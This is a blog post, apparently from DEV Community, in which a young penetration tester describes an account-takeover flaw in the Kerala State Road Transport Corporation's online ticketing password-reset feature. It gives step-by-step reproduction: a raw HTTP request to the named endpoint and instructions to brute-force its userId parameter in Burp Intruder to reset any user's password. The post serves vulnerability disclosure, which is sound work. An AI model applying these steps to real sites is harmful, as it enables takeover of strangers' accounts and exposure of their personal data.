DEV Community

Cover image for How I Hacked Kerala Road Transport Corporation(KSRTC)?
Krishnadev P Melevila
Krishnadev P Melevila

Posted on

How I Hacked Kerala Road Transport Corporation(KSRTC)?

Hello Hackers!! My name is Krishnadev P Melevila, a 19-Year-Old Self-learned cybersecurity enthusiast and web application penetration tester from Kerala, India.

To know more about me, Ask google assistant “Who is Krishnadev P Melevila” Or search for my name on Google.

Today it is about KSRTC!.

What is KSRTC?

Kerala State Road Transport Corporation is a state-owned road transport corporation in the Indian state of Kerala. It is one of the country’s oldest state-run public bus transport services. The corporation is divided into three zones, and its headquarters is in the state capital Thiruvananthapuram.

KSRTC offers an online e-ticketing system, where a user can create an account and able to book tickets. The user is able to manage PNR, cancel/edit/modify tickets, etc… with the e-ticketing account. The website includes data like the user's national identification number, date of birth, passenger details, etc…
Vulnerability: Authentication misconfiguration on password reset functionality

Impact: CRITICAL
Risks: Account takeover
Priority: P1
Scope: Full account takeover,Cancellation of other users tickets, View data of users,View PNR details of other users

Steps to reproduce:

Step 1:Visit https://online.keralartc.com/oprs-web/login/forgotpw.do
KSRTC vulnerable form

Step 2: Enter the previously registered attacker’s known email id and click submit

Step 3: Click the link received on entered mail id

KSRTC Email

Step 4: Enter a new password, submit and intercept that request on a web interceptor like burp suite.

KSRTC hacked by Krishnadev P Melevila

Step 5: On the request, you can see a parameter named “userid”, Bruteforce that user id using intruder and send the request. You can easily brute-force that user id and change any user’s password very easily.

POST /oprs-web/user/updatePasswordNew.do HTTP/2
Host: online.keralartc.com
Cookie: <REDACTED>
Content-Length: 67
Cache-Control: max-age=0
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="96", "Google Chrome";v="96"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: https://online.keralartc.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: <REDACTED>
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,ml;q=0.8,hi;q=0.7
Connection: close

userId=1643727426333&newPassword=Pass123&rePassword=Pass123
Enter fullscreen mode Exit fullscreen mode

Step 6: After a successful brute force, You will be able to see the user’s email on the home page. With that email login with the password, you had set in the previous step.

KSRTC hacked by Krishnadev P Melevila

So that's all guys, This vulnerability is acknowledged by NCIIPC and CERT-IN!

Don’t forget to follow me on medium and other social media. Also please give your 50 claps for this write-up and that’s my inspiration to write more!!

My Instagram handle: https://instagram.com/krishnadev_p_melevila
My Twitter handle: https://twitter.com/Krishnadev_P_M
My LinkedIn handle: https://www.linkedin.com/in/krishnadevpmelevila/
My Personnel website: http://krishnadevpmelevila.com/

Discussion (1)

Collapse
praveenvrp profile image
Praveen

Have you reported this vulnerability to the respective site owner/ Point of contact?